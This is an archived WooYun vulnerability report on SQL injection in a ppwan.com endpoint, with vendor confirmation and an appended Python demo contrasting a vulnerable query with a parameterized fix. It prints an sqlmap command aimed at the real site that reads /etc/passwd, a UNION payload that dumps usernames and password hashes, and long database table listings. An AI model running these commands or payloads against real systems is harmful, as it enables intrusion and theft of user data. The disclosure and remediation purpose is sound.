Vulnerability summary
Defect ID: wooyun-2015-0105527
Title: MySQL injection in a PPWAN endpoint (3 million user records)
Vendor: ppwan.com
Author: 路人甲
Submitted: 2015-04-09 16:57
Fixed: 2015-05-24 17:04
Published: 2015-05-24 17:04
Type: SQL injection
Severity: High
Self-assessed Rank: 10
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure timeline:
2015-04-09: Details sent to the vendor, awaiting vendor handling
2015-04-09: Vendor confirmed; details visible to the vendor only
2015-04-19: Details disclosed to core white hats and relevant domain experts
2015-04-29: Details disclosed to regular white hats
2015-05-09: Details disclosed to intern white hats
2015-05-24: Details disclosed to the public
Brief description:
MySQL injection in a PPWAN endpoint (3 million users), root privileges
Details:
Injection point: http://www.ppwan.com/service/view/?id=9
The database user is root...
---------
I only read files and did not write anything, so rest assured; in the database I only looked at a few important pieces of data, enough to list as proof.
---------
python sqlmap.py -u "http://www.ppwan.com/service/view/?id=1" --dbms=mysql --current-user --file-read "/etc/passwd"
----------------------------------------
Looked at the administrators
Looked at the members; there are presumably a lot, so I only counted the total.
3 million users.
Various order information
-------
Also, the question-submission form in the front-end user center has a stored XSS, which I blind-fired into the back end.
Proof:
[table listing truncated here; the earlier tables of this first database, and its name, are not preserved]
| pp_question |
| pp_role |
| pp_role_user |
| pp_sdj |
| pp_sendpms |
| pp_sendsms |
| pp_serverhtml |
| pp_servers |
| pp_session |
| pp_vipamount |
| pp_viptrace |
| pp_wxcard |
| pp_wxinfo |
| pp_wxinfokey |
| pp_wxnotice |
| pp_wxplugins |
| pp_wxuser |
| pp_wxuserplugins |
| pp_ydhistory |
| pp_ydsj |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: ppbbs
[292 tables]
+----------------------------------------------------+
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_log_field |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedip |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_forum_buylog |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_newprompt |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_secwhite |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_optimizer |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_remote_port |
| pre_common_report |
| pre_common_searchindex |
| pre_common_seccheck |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_visit |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_filter_post |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_hotreply_member |
| pre_forum_hotreply_number |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_newthread |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_polloption_image |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_sofa |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadcalendar |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadhidelog |
| pre_forum_threadhot |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadprofile |
| pre_forum_threadprofile_group |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_mobile_setting |
| pre_passport |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
+----------------------------------------------------+
Database: ppcms
[166 tables]
+----------------------------------------------------+
| ppc_ecms_infoclass_news |
| ppc_ecms_infotmp_news |
| ppc_ecms_news |
| ppc_ecms_news_check |
| ppc_ecms_news_check_data |
| ppc_ecms_news_data_1 |
| ppc_ecms_news_doc |
| ppc_ecms_news_doc_data |
| ppc_ecms_news_doc_index |
| ppc_ecms_news_index |
| ppc_enewsad |
| ppc_enewsadclass |
| ppc_enewsadminstyle |
| ppc_enewsbefrom |
| ppc_enewsbq |
| ppc_enewsbqclass |
| ppc_enewsbqtemp |
| ppc_enewsbqtempclass |
| ppc_enewsbuybak |
| ppc_enewsbuygroup |
| ppc_enewscard |
| ppc_enewsclass |
| ppc_enewsclass_stats |
| ppc_enewsclass_stats_ip |
| ppc_enewsclass_stats_set |
| ppc_enewsclassadd |
| ppc_enewsclassf |
| ppc_enewsclassnavcache |
| ppc_enewsclasstemp |
| ppc_enewsclasstempclass |
| ppc_enewsdiggips |
| ppc_enewsdo |
| ppc_enewsdolog |
| ppc_enewsdownerror |
| ppc_enewsdownrecord |
| ppc_enewsdownurlqz |
| ppc_enewserrorclass |
| ppc_enewsf |
| ppc_enewsfava |
| ppc_enewsfavaclass |
| ppc_enewsfeedback |
| ppc_enewsfeedbackclass |
| ppc_enewsfeedbackf |
| ppc_enewsfile_1 |
| ppc_enewsfile_member |
| ppc_enewsfile_other |
| ppc_enewsfile_public |
| ppc_enewsgbook |
| ppc_enewsgbookclass |
| ppc_enewsgfenip |
| ppc_enewsgroup |
| ppc_enewshmsg |
| ppc_enewshnotice |
| ppc_enewshy |
| ppc_enewshyclass |
| ppc_enewsindexpage |
| ppc_enewsinfoclass |
| ppc_enewsinfotype |
| ppc_enewsinfovote |
| ppc_enewsjstemp |
| ppc_enewsjstempclass |
| ppc_enewskey |
| ppc_enewskeyclass |
| ppc_enewslink |
| ppc_enewslinkclass |
| ppc_enewslinktmp |
| ppc_enewslisttemp |
| ppc_enewslisttempclass |
| ppc_enewslog |
| ppc_enewsloginfail |
| ppc_enewsmember |
| ppc_enewsmember_connect |
| ppc_enewsmember_connect_app |
| ppc_enewsmemberadd |
| ppc_enewsmemberf |
| ppc_enewsmemberfeedback |
| ppc_enewsmemberform |
| ppc_enewsmembergbook |
| ppc_enewsmembergroup |
| ppc_enewsmemberpub |
| ppc_enewsmenu |
| ppc_enewsmenuclass |
| ppc_enewsmod |
| ppc_enewsnewstemp |
| ppc_enewsnewstempclass |
| ppc_enewsnotcj |
| ppc_enewsnotice |
| ppc_enewspage |
| ppc_enewspageclass |
| ppc_enewspagetemp |
| ppc_enewspayapi |
| ppc_enewspayrecord |
| ppc_enewspic |
| ppc_enewspicclass |
| ppc_enewspl_1 |
| ppc_enewspl_set |
| ppc_enewsplayer |
| ppc_enewsplf |
| ppc_enewspltemp |
| ppc_enewspostdata |
| ppc_enewspostserver |
| ppc_enewsprinttemp |
| ppc_enewspublic |
| ppc_enewspublic_update |
| ppc_enewspubtemp |
| ppc_enewspubvar |
| ppc_enewspubvarclass |
| ppc_enewsqmsg |
| ppc_enewssearch |
| ppc_enewssearchall |
| ppc_enewssearchall_load |
| ppc_enewssearchtemp |
| ppc_enewssearchtempclass |
| ppc_enewsshop_address |
| ppc_enewsshop_ddlog |
| ppc_enewsshop_precode |
| ppc_enewsshop_set |
| ppc_enewsshopdd |
| ppc_enewsshopdd_add |
| ppc_enewsshoppayfs |
| ppc_enewsshopps |
| ppc_enewssp |
| ppc_enewssp_1 |
| ppc_enewssp_2 |
| ppc_enewssp_3 |
| ppc_enewssp_3_bak |
| ppc_enewsspacestyle |
| ppc_enewsspclass |
| ppc_enewssql |
| ppc_enewstable |
| ppc_enewstags |
| ppc_enewstagsclass |
| ppc_enewstagsdata |
| ppc_enewstask |
| ppc_enewstempbak |
| ppc_enewstempdt |
| ppc_enewstempgroup |
| ppc_enewstempvar |
| ppc_enewstempvarclass |
| ppc_enewstogzts |
| ppc_enewsuser |
| ppc_enewsuseradd |
| ppc_enewsuserclass |
| ppc_enewsuserjs |
| ppc_enewsuserjsclass |
| ppc_enewsuserlist |
| ppc_enewsuserlistclass |
| ppc_enewsuserloginck |
| ppc_enewsvote |
| ppc_enewsvotemod |
| ppc_enewsvotetemp |
| ppc_enewswapstyle |
| ppc_enewswfinfo |
| ppc_enewswfinfolog |
| ppc_enewswords |
| ppc_enewsworkflow |
| ppc_enewsworkflowitem |
| ppc_enewswriter |
| ppc_enewsyh |
| ppc_enewszt |
| ppc_enewsztadd |
| ppc_enewsztclass |
| ppc_enewsztf |
| ppc_enewsztinfo |
| ppc_enewszttype |
| ppc_enewszttypeadd |
+----------------------------------------------------+
Fix:
You know what to do...
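The report leaves the fix unstated. The following script is an added example, not code from the original report or from ppwan.com: it reproduces the bug pattern behind a `?id=` endpoint on an in-memory SQLite database and shows the hardened form beside it. The table names, column names and sample rows are constructed stand-ins, since the report never shows the real schema behind /service/view/; the UNION payload is in the style sqlmap generates for this class of injection point.

```python
import sqlite3

# Constructed sample schema standing in for the site's MySQL tables.
# Assumption: the real column names are unknown; these are invented.
SCHEMA = """
CREATE TABLE service (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users   (uid INTEGER PRIMARY KEY, username TEXT, pwhash TEXT);
INSERT INTO service VALUES (9, 'Service notice');
INSERT INTO users   VALUES (1, 'admin', 'e10adc3949ba59abbe56e062d1c3ad48');
INSERT INTO users   VALUES (2, 'user1', '25d55ad283aa400af464c76d713c07ad');
"""


def open_db():
    """In-memory database seeded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_vulnerable(conn, id_param):
    """The bug: the untrusted query-string value is spliced into the SQL text,
    so a UNION carried in `id` executes as part of the statement."""
    sql = "SELECT title FROM service WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def view_hardened(conn, id_param):
    """The fix: validate the type the route actually expects, then bind the
    value as a parameter so it can never become SQL syntax."""
    try:
        id_int = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT title FROM service WHERE id=?", (id_int,)).fetchall()


# UNION payload of the kind sqlmap injects into the id parameter.
# SQLite concatenates with ||; on MySQL the equivalent is CONCAT(username, ':', pwhash).
PAYLOAD = "9 UNION SELECT username || ':' || pwhash FROM users"


def demo():
    """Run the payload against both versions of the endpoint."""
    conn = open_db()
    leaked = view_vulnerable(conn, PAYLOAD)   # notice row plus every credential row
    legit = view_hardened(conn, "9")          # the single notice row
    try:
        view_hardened(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True                         # payload rejected before reaching SQL
    return leaked, legit, blocked


if __name__ == "__main__":
    leaked, legit, blocked = demo()
    print("vulnerable endpoint returned:", leaked)
    print("hardened endpoint returned:", legit)
    print("payload rejected by hardened endpoint:", blocked)
```

Run it directly to see the rows the UNION payload pulls out of the vulnerable query. Two points the report implies but does not spell out: the fix is binding the value as a parameter (plus type validation for an integer id), not escaping it into the string; and the root finding is a separate problem from the injection itself, because sqlmap's `--file-read` on MySQL works through LOAD_FILE(), which requires the FILE privilege. A web application's database account should be a dedicated user granted only the SELECT/INSERT/UPDATE/DELETE it needs on its own schema, so that an injection that does slip through still cannot read /etc/passwd or the `mysql.user` table listed in the proof above.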
Copyright notice: when reposting, credit the source 路人甲@乌云
Vulnerability response
Vendor response:
Severity: High
Rank: 10
Confirmed: 2015-04-09 17:03
Vendor comment:
Thanks to the author for the information; the vulnerability has already been fixed.
Latest status:
None